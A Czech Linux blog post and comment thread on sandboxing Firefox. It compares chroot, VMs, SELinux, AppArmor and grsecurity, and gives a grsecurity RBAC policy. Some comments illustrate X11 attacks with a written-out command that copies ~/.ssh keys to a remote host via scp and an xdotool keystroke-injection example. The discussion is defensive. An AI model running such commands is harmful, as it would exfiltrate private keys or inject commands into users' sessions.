abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 10:11 | Komunita
OpenBSD 5.5 vyjde 1. května. Oficiální píseň je už ale k dispozici. Nejnovější hudební hit z produkce OpenBSD je věnován problému roku 2038: Řekněte mi doktore, jaký bude rok, 1901 nebo 2038? OpenBSD 5.5 přijde s 64bitovým time_t na všech platformách. Píseň s názvem Wrap in Time lze stáhnout ve formátech MP3 a OGG.
Ladislav Hagara | Komentářů: 14
včera 23:38 | Pozvánky
LvB a Openmobility vás zvou na 103. sraz příznivců svobodného SW a HW, který se bude konat v pátek 18. dubna od 18 hodin v restauraci Magistr na ulici Hrnčířská 23. Těšíme se na vás.
Ladislav Nešněra | Komentářů: 18
včera 17:18 | Nová verze
Clement "Clem" Lefebvre oznámil, že desktopové prostředí Cinnamon dospělo do verze 2.2. Verze 2.2 vychází půl roku po verzi 2.0 (zprávička). Přehled vybraných nových vlastností i s náhledy v oznámení.
Ladislav Hagara | Komentářů: 14
včera 07:44 | Komunita
Mitchell Baker oznámila, že prozatímním CEO Mozilly se stal Chris Beard. Chris Beard nahradil Brendana Eicha, který před několika dny na funkci CEO rezignoval a Mozillu opustil (zprávička).
Ladislav Hagara | Komentářů: 10
včera 06:15 | Zajímavý projekt
V říjnu loňského roku byl spuštěn projekt, jehož cílem je provést opravdový bezpečnostní audit TrueCryptu (zprávička). Webová stránka Is TrueCrypt Audited Yet? byla aktualizována. První fáze bezpečnostního auditu byla dokončena. Nalezeno bylo několik zranitelností. Nebyla ale nalezena zadní vrátka nebo záměrně škodlivý kód. Na stránkách projektu Open Crypto Audit (OCAP) je k dispozici dvaatřicetistránková závěrečná zpráva (pdf). [Slashdot]
Ladislav Hagara | Komentářů: 6
14.4. 07:32 | Komunita
GNOME Foundation se potýká s finančními problémy. Bylo rozhodnuto o zmrazení veškerých výdajů, které nejsou nezbytně nutné pro chod nadace. Jednou z příčin jsou zvýšené administrativní náklady spojené s projektem Outreach Program for Women (OPW). Podrobnosti v často kladených dotazech (FAQ). Podpořit GNOME Foundation lze několika způsoby. [Slashdot]
Ladislav Hagara | Komentářů: 123
14.4. 07:29 | Nová verze
Gordon "Fyodor" Lyon vydal Nmap 6.45. Nová verze tohoto nástroje zahrnuje mj. skript ssl-heartbleed pro detekci zranitelnosti Heartbleed. Podrobný přehled novinek a vylepšení v Changelogu.
Ladislav Hagara | Komentářů: 0
11.4. 22:48 | Bezpečnostní upozornění
NSA údajně věděla o závažné chybě Heartbleed v OpenSSL už od jejího zanesení do kódu a využívala ji k získávání hesel a dalších důvěrných informací. Ačkoliv má NSA primárně sloužit k obraně USA, dala raději přednost využití pro útok než ochraně vlastního obyvatelstva před špehováním jinými zeměmi.
Luboš Doležel (Doli) | Komentářů: 121
11.4. 09:14 | Zajímavý článek
Allan Day, jeden z hlavních UX návrhářů GNOME, napsal na svém blogu, že má zájem zlepšit vztahy s komunitou, zvláště řešit staré nahlášené chyby, které se neřeší tak rychle jak by měly. To odrazuje pak některé přispěvatele z komunity. Také chce zlepšit zpětnou vazbu od začínajících uživatelů. Mohli by se častěji zapojovat do projektu a hlavně by měli vědět, s čím mohou pomoci.
jadd | Komentářů: 83
11.4. 08:20 | Nová verze
Medusa4 je 2D a 3D CAD aplikace pro tvůrčí návrhy od CAD-Schroer. Dnes je ke stažení nejnovější verze 5.2.1. Pro studenty a osobní použití je jako obvykle zdarma na základě zadané MAC (Eth) adresy a základních osobních údajů - MEDUSA4 Personal. Rozhodně stojí za vyzkoušení všemi, kdo s CAD pracují či hledají levné linuxové řešení.
Petr Ježek | Komentářů: 1
Máte na svém notebooku zašifrovaný pevný disk?
 (76%)
 (24%)
Celkem 395 hlasů
 Komentářů: 8, poslední 14.4. 20:28
Rozcestník
Reklama
Autoškola testy online Levný benzín

Jak je to s tou bezpečností...

12.7.2011 01:18 | Přečteno: 1940× | Linux | Výběrový blog | poslední úprava: 12.7.2011 01:16

Nedávno jsem něco hledal na webu Mozilly a náhodou narazil na jednu zajímavou stránku. Ten pohled mě posadil na prdel. 18 kritických zranitelností za půl roku! Normální přístup by byl ten program smazat a najít si alternativu, to ale v tomhle případě z nejrůznějších důvodů není možné. A tak jsem začal řešit co s tím.

Prakticky mi je jedno jestli útočník získá roota nebo ne - v situaci kdy je kompromitován uživatelský účet se už jedná o obrovský problém - útočník má okamžitě přístup k SSH a GPG klíčům, osobním dokumentům, historii IM a podobně. Takže je nutné omezit proces prohlížeče na přístup pouze k datům která potřebuje. Ale jak na to? Nakonec zůstalo jen pár možností.

1) Vykašlat se na to

Sázet na to, že nenarazím na žádnou stránku se 0day exploitem je sice nejjednodušší ale přece jen, není to zrovna ideální. Ale řeší to tak většina uživatelů tak nakonec proč ne?

2) Separátní uživatel pro webový prohlížeč

Tohle už vypadá slibněji, ale má to pár nedostatků. Stačí zapomenout na nějakém adresáři chmod 0755 a prohlížeč se tam dostane, také může prakticky volně lézt po celém systému (/etc, /usr, /var). Nic příjemného

3) Chroot

Tohle už poskytuje poměrně spolehlivou ochranu. Nevýhody jsou myslím jasné: nutnost kopírovat velké množství knihoven, udržovat minimální paralelní systém (i když se to dá rozumně automatizovat).

4) Virtuální mašina

Z hlediska bezpečnosti chroot na steroidech. Problémy jsou myslím jasné - obrovská spotřeba místa na disku a RAM, celková pomalost. Vzhledem k tomu jaký mám stroj jsem tuhle možnost hned zavrhnul.

5) RBAC systém

=Systém řízení přístupu založený na rolích. Výhody - poměrně slušné oddělení prohlížeče od okolního světa za cenu minimální spotřeby systémových prostředků. Jedinou nevýhodou je dost otravná konfigurace. A pak dilema jaký vybrat.

5a) SELinux

Nevěřím NSA. Stačí? Ne? Od tohohle průšvihu nevěřím moc ani SELinuxu. A na takovouhle jednoduchou úlohu je to moc komplikované.

5b) RSBAC

Mrtvý projekt, nemá cenu dál rozebírat.

5c) AppArmor

Tak tohle už vypadá poměrně zajímavě, navíc se dostal do jádra. Možnostmi konfigurace by vyhovoval - není nijak složitá a zároveň dostačující.

5d) Grsecurity

Ale nakonec to vyhrál Grsecurity i přes nespornou nevýhodu - není v jádře takže se musí externě patchovat. Na druhou stranu je v jednom .patch souboru i se systémem PaX, což je další výhoda. Jen bych krátce zmínil na co si dát při případném použití Grsecurity na desktopu pozor:

No, a nakonec tu mám pravidla pro Firefox pokud to chce někdo zkusit a nechce se s tím patlat (pozor, cesty jsou podle Debianu, takže s/iceweasel/firefox). Pokud bude zájem postupem času doplním i pravidla pro další kritické aplikace (Minimálně Thunderbird/Icedove). Každopádně, omezí to přístup Firefoxu prakticky jen tam kde potřebuje (ok, /lib, /usr/lib a /usr/share jsem povolil celkově, nebavilo mě to vypisovat) a pak ~/Firefox a ~/Shared.

subject /usr/bin/iceweasel o
	-CAP_ALL
	/			hs

	/bin			hs
	/bin/sh			rxi
	/bin/which		rxi
	/bin/readlink		rxi
	
	/dev/null		rw
	/dev/urandom		rw
	/dev/zero		rw
	/dev/snd		rw

	/etc/iceweasel		r
	/etc/nsswitch.conf	r
	/etc/resolv.conf	r
	/etc/hosts		r
	/etc/host.conf		r
	/etc/passwd		r
	/etc/group		r
	/etc/fonts		r
	/etc/localtime		r
	/etc/gai.conf		r
	/etc/ld.so.cache	r
	/etc/locale.alias	r
	/etc/mailcap		r
	/etc/mime.types		r

	/home			hs
	/home/*			r
	/home/*/Firefox 	rwcd
	/home/*/.mozilla	rwcd
	/home/*/Shared		rwcd
	/home/*/.macromedia	rwcd
	/home/*/.asoundrc	r
	/home/*/.Xauthority	r
	/home/*/.Xdefaults	r
	/home/*/.cache/event-sound-cache rw
	/home/*/.local/share/recently-used.xbel r
	/home/*/*		hs

	/lib			rxi

	/proc			r
	
	/usr			r
	/usr/*			hs
	/usr/lib		rxi
	/usr/bin		rxi
	/usr/games		hs
	/usr/local		hs

	/usr/share		r

	/run/dbus/system_bus_socket 	r

	/tmp				rwcd

	/var/cache/fontconfig		r
	/var/tmp			rwcd
	/var/lib/dbus/machine-id 	r
	/var/lib/defoma			r
       

Hodnocení: 83 %

        špatnédobré        

Anketa

Co vy?
 (77 %)
 (4 %)
 (4 %)
 (6 %)
 (13 %)
 (2 %)
 (11 %)
 (4 %)
 (23 %)
Celkem 84 hlasů

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

Josef Kufner avatar 12.7.2011 01:45 Josef Kufner | skóre: 63
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Co jsem si tak všimnul (benchmarky jsem nedělal), tak IE ve Virtualboxu na WinXP je zhruba stejně rychlý i paměťově náročný jako nativní Firefox verze 2.

Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
Hello world ! Segmentation fault (core dumped)
12.7.2011 09:14 Radovan Garabík
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nejlepší variantou by byl chroot vestavěný v prohlížeči
- to by ale musel byť spúšťaný ako root (aspoň v normálnom svete)...
pavlix avatar 12.7.2011 16:00 pavlix | skóre: 47 | blog: pavlix | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
Nevíme, jakými zbraněmi se bude bojovat ve 3. sv. válce, ale je jisté, že ve 4. sv. to budou klacky a kameny.
cezz avatar 12.7.2011 17:05 cezz | skóre: 23 | blog: dm6 | Žilina
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
+1
Computers are not intelligent. They only think they are.
Luk avatar 12.7.2011 02:04 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Firefox je tak pitomý že pokud nemá přístup do adresáře nastaveného jako cíl pro stahování tak nezobrazí chybovou hlášku a neskočí automaticky do nadřazeného adresáře jako každá normální aplikace ale prostě a jednoduše nic neudělá. Super, co?
Zavraždit vývojáře málo ;-)

Ad AppArmor - v openSUSE jsou již vytvořeny profily pro Firefox a Operu, nicméně jsou v extras, čili ve výchozím stavu se nepoužívají. Takže kdo to chce vyzkoušet, stačí přesunout potřebné profily přímo do /etc/apparmor.d a zapnout AppArmor jako takový.
12.7.2011 02:16 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
A bug tim hnije i s patchem skoro čtyři roky.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
12.7.2011 08:30 Mst. Spider | skóre: 35 | blog: xMstSpider
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
6) Stahnout si stranky na jinem PC webspiderem a prohlizet off-line.

7) Vytrhnout kabel ze zdi a nepouzivat internet.

:-D
12.7.2011 09:41 kyytaM | skóre: 35 | blog: kyytaM | Bratislava
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
8) Najst si frajerku/frajera/domace zvieratko a nechodit po pochybnych strankach. :D
Dalibor Smolík avatar 12.7.2011 10:01 Dalibor Smolík | skóre: 53 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Doporučuji zvířátko. To nekecá do výběru navštěvovaných stránek. :-)
Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
12.7.2011 10:04 marek_hb
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
ale neuvaří ...
vain avatar 12.7.2011 11:20 vain | skóre: 15
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To ani "dnešní frajerky" ;-)
If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
AsciiWolf avatar 12.7.2011 12:44 AsciiWolf | skóre: 31 | blog: /var/log/asciiwolf.log
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
:-D
Dalibor Smolík avatar 13.7.2011 17:06 Dalibor Smolík | skóre: 53 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
No právě :-)
Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
12.7.2011 11:21 pasmen | skóre: 45 | blog: glob | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Ale může být uvařeno :-)
12.7.2011 12:45 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To frajerka/frajer taky :)
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
Jendа avatar 13.7.2011 00:15 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
houska avatar 12.7.2011 11:48 houska | skóre: 41 | blog: HW
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
a neoš*ká
12.7.2011 12:01 pasmen | skóre: 45 | blog: glob | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
I tohle je sporné... :-)
12.7.2011 12:47 x0r
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nesouhlasím.
houska avatar 12.7.2011 14:40 houska | skóre: 41 | blog: HW
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
a jaky mas doma zvire?
12.7.2011 18:01 x0r
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

Nejsi nějaký zvědavý? :-)

No dobře, mám psa. ;-)

kotyz avatar 12.7.2011 19:38 kotyz | skóre: 25 | blog: kotyzblog | Radnice
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Se psem by to slo ;-)
Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
13.7.2011 09:32 polymorf | skóre: 14 | blog: tar_zxpf
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Pozor na svalovca
kotyz avatar 13.7.2011 10:13 kotyz | skóre: 25 | blog: kotyzblog | Radnice
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To bys ho musel sežrat, jinak to nechytneš.
Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
13.7.2011 18:52 x0r
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

+1

Tohle se mne opravdu netýká. Jsem vegetarián. ;-)

13.7.2011 21:04 w4rr10r
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Orál?
13.7.2011 22:42 x0r
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
?
kotyz avatar 13.7.2011 23:41 kotyz | skóre: 25 | blog: kotyzblog | Radnice
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Kloaka! :-D
Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
12.7.2011 15:54 Bubak
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Mohl by autor rozvest proc nejde pouzit napriklad Chromium? Z hlediska bezpecnosti je o svetelne roky napred (napriklad kazdy Tab ma vlastni sandbox).

12.7.2011 17:16 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Rozšíření Tamper Data :)
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
AsciiWolf avatar 12.7.2011 17:20 AsciiWolf | skóre: 31 | blog: /var/log/asciiwolf.log
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
pavlix avatar 12.7.2011 15:58 pavlix | skóre: 47 | blog: pavlix | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
mezi (3) a (4) chybí možnost kontejnerů, vzhledem k tomu, že u (4) tvrdíš, že virtualizace má obrovskou režii, tak určitě kontejnery nezahrnuješ.
Nevíme, jakými zbraněmi se bude bojovat ve 3. sv. válce, ale je jisté, že ve 4. sv. to budou klacky a kameny.
12.7.2011 17:19 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
pavlix avatar 12.7.2011 17:58 pavlix | skóre: 47 | blog: pavlix | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
Kéž by :D.
Nevíme, jakými zbraněmi se bude bojovat ve 3. sv. válce, ale je jisté, že ve 4. sv. to budou klacky a kameny.
12.7.2011 16:34 SPM | skóre: 27
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Hádám, že při použití chrootu/jiného usera apod. narazím na první problém ve chvíli, kdy tim browserem budu chtít něco vyuploadovat z disku, co? :)
12.7.2011 17:11 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Jo, jediná možnost je to šibovat třeba přes /tmp :)
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
Josef Kufner avatar 12.7.2011 17:45 Josef Kufner | skóre: 63
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Raději ~/tmp a nechat tam bydlet samouklízecí script ;-)
Hello world ! Segmentation fault (core dumped)
12.7.2011 17:37 marvn
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
a noscript by nestacil?
Josef Kufner avatar 12.7.2011 17:44 Josef Kufner | skóre: 63
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nestačil. Bugy jsou i ve zpracování obrázků a dalších věcech. Navíc většina webů je bez javascriptu docela na nic :-(
Hello world ! Segmentation fault (core dumped)
12.7.2011 17:46 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Ne. Chyby nejsou jen v JS: 1, 2...
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
14.7.2011 10:56 marvn
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
jo no, pravda
pavlix avatar 12.7.2011 17:59 pavlix | skóre: 47 | blog: pavlix | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
A vytažení síťového kabelu? :)
Nevíme, jakými zbraněmi se bude bojovat ve 3. sv. válce, ale je jisté, že ve 4. sv. to budou klacky a kameny.
wiskas avatar 12.7.2011 17:57 wiskas | skóre: 21 | blog: Raziel
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
5e) TOMOYO

Je v jádře, vyvíjí se a jednoduše se nastavuje. Akorát o ní moc lidí neví, takže návodů člověk na internetech moc nenajde.
Libav developer. | The world is just a lot of people trolling each other.
Jendа avatar 13.7.2011 00:15 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Ano, už nad ním delší dobu medituju, ale pořád jsem neměl sílu to nastavit. Nějaká stránka s bezpečnostními politikami pro inspiraci? ;)
wiskas avatar 13.7.2011 12:27 wiskas | skóre: 21 | blog: Raziel
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
O ničem nevim.

Já ji mám v enforcing mode jen pro firefox. Tam jsem nejdřív na pár hodin zapnul learning mode (kde se každá operace automaticky povolí a přidá do whitelistu) a pak profiltroval výsledek.
Libav developer. | The world is just a lot of people trolling each other.
gtz avatar 12.7.2011 18:15 gtz | skóre: 27 | blog: merlins | Brno - Venkov / Rosicko
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
copak by na ty ďoury řekl náš expert na Mozillu Péťa?
- nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
12.7.2011 18:46 SPM | skóre: 27
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To je otázka, jestli je i dostatečný expert i na ďoury...
12.7.2011 18:47 kkaarreell | skóre: 6 | blog: perkele
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Se SElinuxem muzes pustit firefox v sandboxu, na tom nic sloziteho neni. Viz treba http://www.partlycloudy.org/2010/11/14/selinux-sandboxed-firefox.html
12.7.2011 18:51 Woknař
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Doporučuji Lexaurin. Ta paranoia po něm trochu povolí.
12.7.2011 18:57 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Doporučuju kouknout na kolika blacklistech je tvoje IP. To pak to sebevědomí trochu povolí.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
12.7.2011 21:46 smartin
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
ber to tak, ze u zavrenych prohlizecu vyjma Chrome (ktery je jen nadstavbou Chromium) o tehlech chybach nemas ani tuseni. IE by o tomhle mohlo psat sahodlouhe bakalarky.
12.7.2011 23:10 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To není pravda, MS o bezpečnostních aktualizacích informuje, Opera taky. Ale řešit kdo je na tom hůř když jsou na tom tragicky všichni...
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
12.7.2011 22:20 ET
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
IMHO: sice se nevyhnes kompromitaci systemu, ale nic co by reboot nespravil - LIVE distro rulez - [nejlip vyprdnout z kernelu driver k radici disku, kdyz je clovek hodne paranoidni - coz asi zabije i cdromku, ale bootovat pres sit se taky da ]

good luck

PS: UTFG "ubuntu toram"
12.7.2011 23:11 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To je ale DOST nepraktický.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
12.7.2011 23:20 ET
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
njn, jako vzdy je to boj "komfort vs bezpecnost" - ja jen pro doplneni

btw: na i-banking bych nesel do niceho jinyho, ale je to holt individualni
Jendа avatar 13.7.2011 00:15 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Pozor, i když jsi omezil přístup k souborům, pořád je to neosekaná X aplikace a může tedy keyloggerovat nebo posílat příkazy/klávesy ostatním aplikacím - třeba pošle 'scp -r ~/.ssh dastych@uooz.mvcr.cz:pripady/kinderporno/' xtermu.
13.7.2011 00:52 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Pravda. Ale jaké řešení? Pouštět to v jiné instanci Xek?
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
Jendа avatar 13.7.2011 01:17 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Hrál jsem si s „nested“ X serverem (Xephyr, Xnest a spol), ale vyladit to k dokonalosti se mi to nepovedlo (nic moc GTK téma, nefunkční schránka, pomalá odezva kurzoru myši).
13.7.2011 20:25 Hoody
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To by šlo vyřešit tím že zakážeš fork() nebo zakážeš/omezíš execve() (a spol.) ne? Nevim jak se to dělá, ale podle nějakýho článku na linux.com by to se SELinux jít mělo (i když tam nebylo napsaný jak).

Každopádně zabránit prohlížeči aby logoval klávesy a někam je posílal asi nejde.
Jendа avatar 13.7.2011 20:30 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Forkování by mělo být tak nějak defaultně nastavené na dědění omezení (jako že když prohlížeč, co nemůže do .ssh, forkne cat, tak ten taky nebude moct do .ssh). Ale k hrátkám v X nový proces nepotřebuješ.
13.7.2011 20:36 Hoody
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Co jsou "hrátky v X" a co jaký jsou hrozby?
13.7.2011 21:18 penej
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
bump pro výbornou bouřku v Praze (vážně mě to zajímá)
Jendа avatar 13.7.2011 21:20 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Zkus si třeba
xdotool key d a t e Return
A takhle může třeba zkompromitovaný prohlížeč poslat terminálu libovolný příkaz.
14.7.2011 00:00 Martin B. | skóre: 27 | blog: hromada
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Jak uz tu bylo nejednou receno, pokud ma program pristup ke tvym xkam (treba protoze na nich chce zobrazovat sve okno), muze sledovat udalosti stisknuti klaves nebo je generovat a to oboje pro libovolny program spusteny ve stejnych xkach. Hezky priklad treba zde: The Linux Security Circus: On GUI isolation.
I think warning here is a bug. The biggest cloud service provider. There is no point in being so cool in a cold world.
1.8.2011 16:00 Hoody
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
nasel jsem http://www.nsa.gov/research/_files/selinux/papers/x11/t1.shtml

zatim jsem nemel cast to precist, ale vypada to ze presne resi tenhle problem
1.8.2011 16:02 Hoody
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
taky http://selinuxproject.org/page/NB_XWIN
13.7.2011 10:38 penej
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nevěřím NSA. Stačí? Ne? Od tohohle průšvihu nevěřím moc ani SELinuxu. A na takovouhle jednoduchou úlohu je to moc komplikované.

Jinak:

V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.

Nebuď dumbfuck. Proč věříš grsecurity?

A zapomněl jsi na TOMOYO.

13.7.2011 11:41 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.
Co? Nechápu souvislost mezi odposlechem telefonů a hypotetickým trojanem v SELinuxu.
Proč věříš grsecurity?
Protože pokud vím v grsec se ještě neobjevila zranitelnost typu local root :)
A zapomněl jsi na TOMOYO.
To jo.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
13.7.2011 17:00 a.syntsow
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Objavila ...sice len 2* ale objavila. Neviem naco to tu riesis Mrkva. Viem ze chodis na spenderov kanal, preboha pytaj sa tam tych ludi. Je tam napriklad aj security vyvojar Ubuntu. Pytaj sa ich. Nie drbnutych ceskych stredoskolakov a pseudocelebritiek.
13.7.2011 17:21 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Objavila ...sice len 2* ale objavila.
Pravda, málo jsem hledal. Pardon.
Neviem naco to tu riesis Mrkva
Zajímá mě jak kdo řeší bezpečnost z místního osazenstva.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
13.7.2011 17:25 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Viem ze chodis na spenderov kanal
A tohle mi od paranoie nepomohlo.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
13.7.2011 17:41 a.syntsow
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
To ta len slachti ze nie si ako oni. Tuto to proste neries oni to nepochopia. Ja som tam tiez my dvaja sme sa dokonca bavili len je asi moja paranoia vacsia ako tvoja :) Napis mi niekde jabber skontaktujem ta a ked tak mozme pokecat.
13.7.2011 18:00 l5-1
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
spenderov kanal?
13.7.2011 18:50 Mrkva | skóre: 20 | blog: urandom
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
#grsecurity na OFTC.
To není žádné DRM, to je obchodní model! | Většina z nás, co jsme tady, jsme bílí mágové různého stupně.
13.7.2011 19:31 l5-1
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
proc se tomu rika spenderov kanal?
13.7.2011 16:13 CEST
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Zalezi na tom, jak dlouho je takova chyba neopravena. Ze melo neco 18 chyb za pul roku neznamena, ze byly uspesne napadeny vsechny pocitace. Normalne to totiz funguje tak, ze nekdo najde chybu. Kdyz to je black-hat, tak je problem, ale web viry se spis mnozi po utocich script kiddies, black hat delaji neco lepsiho. Pokud je to white head, tak upozorni autory a ti maji cas na opravu. Pokud na to nekde kasle (slysel jsem Microsoft?), tak je potom sranda. Po nejake dobe je pak chyba zverejnena, ale pokud autor reagoval, tak je jiz opravena a uzivatele by meli byt v pohode - z toho plyne aktualizovat - ja vim, v tech Vistach/7 je to otrava (aktualizovat, aktualizovat pri vypinani, aktualizovat pri zapinani) a navic jeste kazdej program hlidat zvlast (nebo proste zvlast odklikat X aktualizatoru).

